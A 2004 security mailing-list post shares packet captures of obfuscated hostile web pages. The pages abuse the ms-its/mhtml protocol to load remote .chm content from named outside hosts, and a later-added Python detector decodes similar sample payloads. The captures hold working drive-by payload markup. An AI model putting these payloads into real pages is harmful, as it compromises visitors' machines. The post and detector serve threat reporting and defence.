[Intrusions] obfuscated ms-its/.chm hostile web page attacks

James Affeld jamesaffeld at yahoo.com
Tue Jul 27 20:40:41 GMT 2004


There are a few "reputable" websites that use the
ms-its protocol, but not many.  The ones that
obfuscate their invocation of this protocol are
presumptively not reputable.  On the basis of the
following captures, I suggest shunning 64.159.79.20,
38.113.1.157, 66.98.144.21, and 69.20.51.244.

Some of them are lifting obfuscation techniques
directly from POC discussions along the lines of, "If
I wanted to be evil, I could obfuscate this as
follows..."  One uses more elaborate techniques as
well.

Basic:
69.20.51.244
66.98.144.21
64.159.79.20

More involved:
38.113.1.157

reference (one of many):
http://www.securityfocus.com/bid/9320/info/
---
13:23:47.253309 64.159.79.20.80 > W.X.Y.Z.4811: P [tcp sum ok] 1143801791:1143802515()
  0000: 4500 02fc da00 4000 3606 XXXX 409f 4f14  E..üÚ.@.6.Å.@.O.
  0010: WX YZ 0050 12cb 442d 07bf 0564 8202  ¨.j&.P.ËD-.¿.d..
  0020: 5018 1920 d81a 0000 4854 5450 2f31 2e31  P.. Ø...HTTP/1.1
  0030: 2032 3030 204f 4b0d 0a44 6174 653a 2046   200 OK..Date: F
  0040: 7269 2c20 3136 204a 756c 2032 3030 3420  ri, 16 Jul 2004
  0050: 3230 3a32 373a 3136 2047 4d54 0d0a 5365  20:27:16 GMT..Se
  0060: 7276 6572 3a20 4170 6163 6865 2f31 2e33  rver: Apache/1.3
  0070: 2e32 3820 2855 6e69 7829 2050 4850 2f34  .28 (Unix) PHP/4
  0080: 2e33 2e31 0d0a 4c61 7374 2d4d 6f64 6966  .3.1..Last-Modif
  0090: 6965 643a 2046 7269 2c20 3039 204a 756c  ied: Fri, 09 Jul
  00a0: 2032 3030 3420 3139 3a31 333a 3131 2047   2004 19:13:11 G
  00b0: 4d54 0d0a 4554 6167 3a20 2233 3738 3533  MT..ETag: "37853
  00c0: 312d 3161 642d 3430 6565 6565 3437 220d  1-1ad-40eeee47".
  00d0: 0a41 6363 6570 742d 5261 6e67 6573 3a20  .Accept-Ranges:
  00e0: 6279 7465 730d 0a43 6f6e 7465 6e74 2d4c  bytes..Content-L
  00f0: 656e 6774 683a 2034 3239 0d0a 4b65 6570  ength: 429..Keep
  0100: 2d41 6c69 7665 3a20 7469 6d65 6f75 743d  -Alive: timeout=
  0110: 352c 206d 6178 3d31 3030 0d0a 436f 6e6e  5, max=100..Conn
  0120: 6563 7469 6f6e 3a20 4b65 6570 2d41 6c69  ection: Keep-Ali
  0130: 7665 0d0a 436f 6e74 656e 742d 5479 7065  ve..Content-Type
  0140: 3a20 7465 7874 2f68 746d 6c0d 0a0d 0a0d  : text/html.....
  0150: 0a3c 2144 4f43 5459 5045 2048 544d 4c20  .<!DOCTYPE HTML
  0160: 5055 424c 4943 2022 2d2f 2f57 3343 2f2f  PUBLIC "-//W3C//
  0170: 4454 4420 4854 4d4c 2034 2e30 2054 7261  DTD HTML 4.0 Tra
  0180: 6e73 6974 696f 6e61 6c2f 2f45 4e22 3e0d  nsitional//EN">.
  0190: 0a0d 0a3c 6874 6d6c 3e0d 0a3c 6865 6164  ...<html>..<head
  01a0: 3e0d 0a09 3c74 6974 6c65 3e77 6169 742e  >...<title>wait.
  01b0: 2e2e 3c2f 7469 746c 653e 0d0a 3c2f 6865  ..</title>..</he
  01c0: 6164 3e0d 0a0d 0a3c 626f 6479 3e0d 0a0d  ad>....<body>...
  01d0: 0a3c 5445 5854 4152 4541 2069 643d 6378  .<TEXTAREA id=cx
  01e0: 7720 7374 796c 653d 2244 4953 504c 4159  w style="DISPLAY
  01f0: 3a20 6e6f 6e65 223e 3c6f 626a 6563 7420  : none"><object
  0200: 6461 7461 3d22 247b 5052 7d22 2074 7970  data="${PR}" typ
  0210: 653d 2274 6578 742f 782d 7363 7269 7074  e="text/x-script
  0220: 6c65 7422 2077 6964 7468 3d22 3022 2068  let" width="0" h
  0230: 6569 6768 743d 2230 223e 3c2f 6f62 6a65  eight="0"></obje
  0240: 6374 3e3c 2f54 4558 5441 5245 413e 3c53  ct></TEXTAREA><S
  0250: 4352 4950 543e 646f 6375 6d65 6e74 2e77  CRIPT>document.w
  0260: 7269 7465 2863 7877 2e76 616c 7565 2e72  rite(cxw.value.r
  0270: 6570 6c61 6365 2822 247b 5052 7d22 2c22  eplace("${PR}","
  0280: 2623 3130 393b 732d 6974 733a 2623 3130  &#109;s-its:&#10
  0290: 393b 6874 6d6c 3a66 696c 653a 2f2f 633a  9;html:file://c:
  02a0: 5c5c 6e6f 7375 6368 2e6d 6874 2168 7474  \\nosuch.mht!htt
  02b0: 703a 2f2f 7777 772e 7573 7469 6d65 727a  p://www.ustimerz
  02c0: 2e63 6f6d 2f74 6d31 3131 3132 2f76 6172  .com/tm11112/var
  02d0: 312e 6368 6d3a 3a2f 312e 6874 6d22 2929  1.chm::/1.htm"))
  02e0: 3b3c 2f53 4352 4950 543e 0d0a 3c2f 626f  ;</SCRIPT>..</bo
  02f0: 6479 3e0d 0a3c 2f68 746d 6c3e            dy>..</html>

--------------------
13:26:20.500282 38.113.1.157.80 > W.X.Y.Z.1069: P [tcp sum ok] 430:916(486) ack 423 )
  0000: 4500 020e 4b09 4000 2e06 XXXX 2671 019d  E...K.@...Æ¥&q..
  0010: WX YZ 0050 042d 5f04 a197 cfd0 a1c5  ¨.h..P.-_.¡.ÏСÅ
  0020: 5018 1d50 c907 0000 4854 5450 2f31 2e31  P..PÉ...HTTP/1.1
  0030: 2032 3030 204f 4b0d 0a44 6174 653a 2054   200 OK..Date: T
  0040: 6875 2c20 3232 204a 756c 2032 3030 3420  hu, 22 Jul 2004
  0050: 3230 3a32 363a 3330 2047 4d54 0d0a 5365  20:26:30 GMT..Se
  0060: 7276 6572 3a20 4170 6163 6865 0d0a 4c61  rver: Apache..La
  0070: 7374 2d4d 6f64 6966 6965 643a 2053 756e  st-Modified: Sun
  0080: 2c20 3138 204a 756c 2032 3030 3420 3032  , 18 Jul 2004 02
  0090: 3a34 343a 3436 2047 4d54 0d0a 4554 6167  :44:46 GMT..ETag
  00a0: 3a20 2232 3963 3934 6631 2d65 642d 3430  : "29c94f1-ed-40
  00b0: 6639 6534 3165 220d 0a43 6f6e 7465 6e74  f9e41e"..Content
  00c0: 2d4c 656e 6774 683a 2032 3337 0d0a 4b65  -Length: 237..Ke
  00d0: 6570 2d41 6c69 7665 3a20 7469 6d65 6f75  ep-Alive: timeou
  00e0: 743d 312c 206d 6178 3d31 3938 0d0a 436f  t=1, max=198..Co
  00f0: 6e6e 6563 7469 6f6e 3a20 4b65 6570 2d41  nnection: Keep-A
  0100: 6c69 7665 0d0a 436f 6e74 656e 742d 5479  live..Content-Ty
  0110: 7065 3a20 7465 7874 2f68 746d 6c0d 0a0d  pe: text/html...
  0120: 0a3c 7363 7269 7074 3e0d 0a64 6f63 756d  .<script>..docum
  0130: 656e 742e 7772 6974 6528 273c 6f62 6a65  ent.write('<obje
  0140: 6374 2064 6174 613d 2226 2331 3039 3b73  ct data="&#109;s
  0150: 2d69 7473 3a6d 6827 2b27 746d 272b 276c  -its:mh'+'tm'+'l
  0160: 272b 273a 272b 2766 272b 2769 6c65 272b  '+':'+'f'+'ile'+
  0170: 273a 2f2f 433a 5c5c 6627 2b27 6f6f 272b  '://C:\\f'+'oo'+
  0180: 272e 6d68 272b 2774 2127 2b27 6874 7470  '.mh'+'t!'+'http
  0190: 272b 273a 2f2f 7765 622d 6269 7a2d 272b  '+'://web-biz-'+
  01a0: 2773 7475 6469 6f2e 636f 6d2f 272b 2773  'studio.com/'+'s
  01b0: 272b 276b 272b 276d 2e63 686d 3a3a 2f69  '+'k'+'m.chm::/i
  01c0: 6e64 6578 2e27 2b27 6874 272b 276d 2220  ndex.'+'ht'+'m"
  01d0: 7479 272b 2770 653d 2274 6578 7427 2b27  ty'+'pe="text'+'
  01e0: 2f78 2d27 2b27 7363 7227 2b27 6970 7427  /x-'+'scr'+'ipt'
  01f0: 2b27 6c65 7422 3e3c 2f6f 626a 6563 743e  +'let"></object>
  0200: 2729 3b0d 0a3c 2f73 6372 6970 743e       ');..</script>

-----------------------------
15:34:03.963005 66.98.144.21.80 > W.X.Y.Z.1973: P [tcp sum ok] 314083024:314083697(6)
  0000: 4500 02c9 84a2 4000 3406 XXXX 4262 9015  E..É.¢@.4.ÝÌBb..
  0010: WX YZ 0050 07b5 12b8 86d0 ed43 eee6  ¨.f¬.P.µ.¸.ÐíCîæ
  0020: 5018 1920 499e 0000 4854 5450 2f31 2e31  P.. I...HTTP/1.1
  0030: 2032 3030 204f 4b0d 0a44 6174 653a 204d   200 OK..Date: M
  0040: 6f6e 2c20 3139 204a 756c 2032 3030 3420  on, 19 Jul 2004
  0050: 3232 3a33 343a 3133 2047 4d54 0d0a 5365  22:34:13 GMT..Se
  0060: 7276 6572 3a20 4170 6163 6865 2f32 2e30  rver: Apache/2.0
  0070: 2e34 370d 0a4c 6173 742d 4d6f 6469 6669  .47..Last-Modifi
  0080: 6564 3a20 5468 752c 2031 3520 4a75 6c20  ed: Thu, 15 Jul
  0090: 3230 3034 2031 353a 3037 3a32 3420 474d  2004 15:07:24 GM
  00a0: 540d 0a45 5461 673a 2022 3830 6330 3134  T..ETag: "80c014
  00b0: 2d31 6231 2d66 3631 6333 3030 220d 0a41  -1b1-f61c300"..A
  00c0: 6363 6570 742d 5261 6e67 6573 3a20 6279  ccept-Ranges: by
  00d0: 7465 730d 0a43 6f6e 7465 6e74 2d4c 656e  tes..Content-Len
  00e0: 6774 683a 2034 3333 0d0a 436f 6e6e 6563  gth: 433..Connec
  00f0: 7469 6f6e 3a20 636c 6f73 650d 0a43 6f6e  tion: close..Con
  0100: 7465 6e74 2d54 7970 653a 2074 6578 742f  tent-Type: text/
  0110: 6874 6d6c 0d0a 0d0a 3c68 746d 6c3e 0d0a  html....<html>..
  0120: 3c68 6561 643e 0d0a 3c62 6f64 7920 6f6e  <head>..<body on
  0130: 6265 666f 7265 756e 6c6f 6164 3d22 7769  beforeunload="wi
  0140: 6e64 6f77 2e6f 7065 6e28 2768 7474 703a  ndow.open('http:
  0150: 2f2f 706c 6169 6e2e 756e 692d 7573 2e6e  //plain.uni-us.n
  0160: 6574 2f70 6167 6573 2f67 6f2e 6874 6d6c  et/pages/go.html
  0170: 272c 2727 2c27 2729 3b22 3e0d 0a3c 7465  ','','');">..<te
  0180: 7874 6172 6561 2069 643d 2263 6f64 6577  xtarea id="codew
  0190: 696e 6422 2073 7479 6c65 3d22 6469 7370  ind" style="disp
  01a0: 6c61 793a 6e6f 6e65 3b22 3e0d 0a20 2020  lay:none;">..
  01b0: 203c 6f62 6a65 6374 2064 6174 613d 2224   <object data="$
  01c0: 7b50 4154 487d 2220 7479 7065 3d22 7465  {PATH}" type="te
  01d0: 7874 2f78 2d73 6372 6970 746c 6574 223e  xt/x-scriptlet">
  01e0: 3c2f 6f62 6a65 6374 3e0d 0a3c 2f74 6578  </object>..</tex
  01f0: 7461 7265 613e 0d0a 3c73 6372 6970 7420  tarea>..<script
  0200: 6c61 6e67 7561 6765 3d22 4a61 7661 5363  language="JavaSc
  0210: 7269 7074 223e 0d0a 2020 2020 646f 6375  ript">..    docu
  0220: 6d65 6e74 2e77 7269 7465 2863 6f64 6577  ment.write(codew
  0230: 696e 642e 7661 6c75 652e 7265 706c 6163  ind.value.replac
  0240: 6528 2f5c 247b 5041 5448 7d2f 672c 2726  e(/\${PATH}/g,'&
  0250: 2331 3039 3b73 2d69 7473 3a6d 6874 6d6c  #109;s-its:mhtml
  0260: 3a66 696c 653a 2f2f 433a 5c66 6f6f 2e6d  :file://C:\foo.m
  0270: 6874 2168 7474 703a 2f2f 7777 7731 2e73  ht!http://www1.s
  0280: 6d61 7274 7570 6461 7465 722e 636f 6d2f  martupdater.com/
  0290: 726f 622f 7a33 322e 6368 6d3a 3a2f 7374  rob/z32.chm::/st
  02a0: 6172 742e 6874 6d6c 2729 293b 0d0a 3c2f  art.html'));..</
  02b0: 7363 7269 7074 3e0d 0a3c 2f62 6f64 793e  script>..</body>
  02c0: 0d0a 3c2f 6874 6d6c 3e                   ..</html>

------------------------------
16:11:48.814445 69.20.51.244.80 > W.X.Y.Z.3381: P [tcp sum ok] 482608625:482609223(598)
  0000: 4500 027e 8727 4000 3106 XXXX 4514 33f4  E..~.'@.1.;zE.3ô
  0010: WX YZ 0050 0d35 1cc4 05f1 b384 40d6  ¨.c4.P.5.Ä.ñ³.@Ö
  0020: 5018 1920 f75e 0000 4854 5450 2f31 2e31  P.. ÷^..HTTP/1.1
  0030: 2032 3030 204f 4b0d 0a44 6174 653a 2057   200 OK..Date: W
  0040: 6564 2c20 3231 204a 756c 2032 3030 3420  ed, 21 Jul 2004
  0050: 3233 3a31 313a 3538 2047 4d54 0d0a 5365  23:11:58 GMT..Se
  0060: 7276 6572 3a20 4170 6163 6865 2f31 2e33  rver: Apache/1.3
  0070: 2e32 3720 2855 6e69 7829 2020 2852 6564  .27 (Unix)  (Red
  0080: 2d48 6174 2f4c 696e 7578 2920 4672 6f6e  -Hat/Linux) Fron
  0090: 7450 6167 652f 352e 302e 322e 3236 3233  tPage/5.0.2.2623
  00a0: 206d 6f64 5f70 7974 686f 6e2f 322e 372e   mod_python/2.7.
  00b0: 3820 5079 7468 6f6e 2f31 2e35 2e32 206d  8 Python/1.5.2 m
  00c0: 6f64 5f73 736c 2f32 2e38 2e31 3220 4f70  od_ssl/2.8.12 Op
  00d0: 656e 5353 4c2f 302e 392e 3662 2044 4156  enSSL/0.9.6b DAV
  00e0: 2f31 2e30 2e33 2050 4850 2f34 2e33 2e36  /1.0.3 PHP/4.3.6
  00f0: 206d 6f64 5f70 6572 6c2f 312e 3236 206d   mod_perl/1.26 m
  0100: 6f64 5f77 6562 6170 702f 312e 322e 302d  od_webapp/1.2.0-
  0110: 6465 760d 0a58 2d50 6f77 6572 6564 2d42  dev..X-Powered-B
  0120: 793a 2050 4850 2f34 2e33 2e36 0d0a 436f  y: PHP/4.3.6..Co
  0130: 6e6e 6563 7469 6f6e 3a20 636c 6f73 650d  nnection: close.
  0140: 0a54 7261 6e73 6665 722d 456e 636f 6469  .Transfer-Encodi
  0150: 6e67 3a20 6368 756e 6b65 640d 0a43 6f6e  ng: chunked..Con
  0160: 7465 6e74 2d54 7970 653a 2074 6578 742f  tent-Type: text/
  0170: 6874 6d6c 0d0a 0d0a 6661 200d 0a3c 7363  html....fa ..<sc
  0180: 7269 7074 3e0d 0a64 6f63 756d 656e 742e  ript>..document.
  0190: 7772 6974 6528 273c 6f62 6a65 6374 2064  write('<object d
  01a0: 6174 613d 2226 2331 3039 3b73 2d69 7473  ata="&#109;s-its
  01b0: 3a6d 6827 2b27 746d 272b 276c 272b 273a  :mh'+'tm'+'l'+':
  01c0: 272b 2766 272b 2769 6c65 272b 273a 2f2f  '+'f'+'ile'+'://
  01d0: 433a 5c5c 6627 2b27 6f6f 272b 272e 6d68  C:\\f'+'oo'+'.mh
  01e0: 272b 2774 2127 2b27 6874 7470 272b 273a  '+'t!'+'http'+':
  01f0: 2f2f 7777 772e 6a69 7661 272b 2763 7265  //www.jiva'+'cre
  0200: 6174 6976 652e 636f 6d2f 696d 6167 6573  ative.com/images
  0210: 2f69 636f 6e73 2f27 2b27 7527 2b27 7327  /icons/'+'u'+'s'
  0220: 2b27 612e 6368 6d3a 3a2f 312e 272b 2768  +'a.chm::/1.'+'h
  0230: 7427 2b27 6d22 2074 7927 2b27 7065 3d22  t'+'m" ty'+'pe="
  0240: 7465 7874 272b 272f 782d 272b 2773 6372  text'+'/x-'+'scr
  0250: 272b 2769 7074 272b 276c 6574 223e 3c2f  '+'ipt'+'let"></
  0260: 6f62 6a65 6374 3e27 293b 0d0a 3c2f 7363  object>');..</sc
  0270: 7269 7074 3e0d 0a0d 0a30 0d0a 0d0a       ript>....0....

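A proxy- or IDS-side check for the three tricks the captures above share (a character reference hiding the scheme, JavaScript string splitting, and a hidden textarea placeholder swapped for the real URL by script), added here as an example and not part of the original post; the sample bodies and host.invalid are constructed stand-ins for the captured pages, not copies of them.

```python
import html
import re

# Response bodies constructed for this example (placeholder host). They
# mirror the captures above: "&#109;s-its:" in the scheme, 'mh'+'tm'+'l'
# string splitting, and a hidden <textarea> whose "${PR}" placeholder is
# replaced by script with the real ITS URL.
SAMPLES = {
    "placeholder": ('<TEXTAREA id=cxw style="DISPLAY: none"><object data="${PR}" '
                    'type="text/x-scriptlet"></object></TEXTAREA><SCRIPT>'
                    'document.write(cxw.value.replace("${PR}","&#109;s-its:&#109;html:'
                    'file://c:\\\\nosuch.mht!http://host.invalid/x.chm::/1.htm"));</SCRIPT>'),
    "concat": ("<script>document.write('<object data=\"&#109;s-its:mh'+'tm'+'l'+':'+'f'+"
               "'ile'+'://C:\\\\f'+'oo'+'.mh'+'t!'+'http'+'://host.invalid/'+'s'+'k'+"
               "'m.chm::/index.'+'ht'+'m\" ty'+'pe=\"text'+'/x-'+'scr'+'ipt'+'let\">"
               "</object>');</script>"),
    "benign": '<p>Manual: <a href="http://host.invalid/docs/manual.chm">manual.chm</a></p>',
}

# An ITS reference as the browser would see it: ms-its:/mhtml: scheme, then
# a path containing "<file>.chm::/" (the CHM-internal path separator).
ITS_URL_RE = re.compile(r'''(?<![\w-])(?:ms-its|mhtml):[^"'<>\s]*\.chm::/[^"'<>\s)]*''', re.I)
SCRIPTLET_RE = re.compile(r'type\s*=\s*"?text/x-scriptlet', re.I)


def normalize(body: str) -> str:
    """Undo the cheap obfuscations so a plain regex sees what the browser executes."""
    text = re.sub(r"'\s*\+\s*'", "", body)  # 'mh'+'tm'+'l'  ->  'mhtml'
    text = re.sub(r'"\s*\+\s*"', "", text)
    return html.unescape(text)               # &#109;s-its:   ->  ms-its:


def scan(body: str) -> dict:
    """Report ITS URLs, the text/x-scriptlet object flag, and whether the
    scheme was hidden in the raw body (visible only after normalisation)."""
    norm = normalize(body)
    urls = ITS_URL_RE.findall(norm)
    return {
        "its_urls": urls,
        "scriptlet": bool(SCRIPTLET_RE.search(norm)),
        "obfuscated": bool(urls) and ITS_URL_RE.search(body) is None,
    }


if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, scan(body))
```

A plain `.chm` download link is not flagged; only an ITS-style `.chm::/` path behind an ms-its or mhtml scheme is, and the `obfuscated` flag marks bodies where that scheme only appears after decoding.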
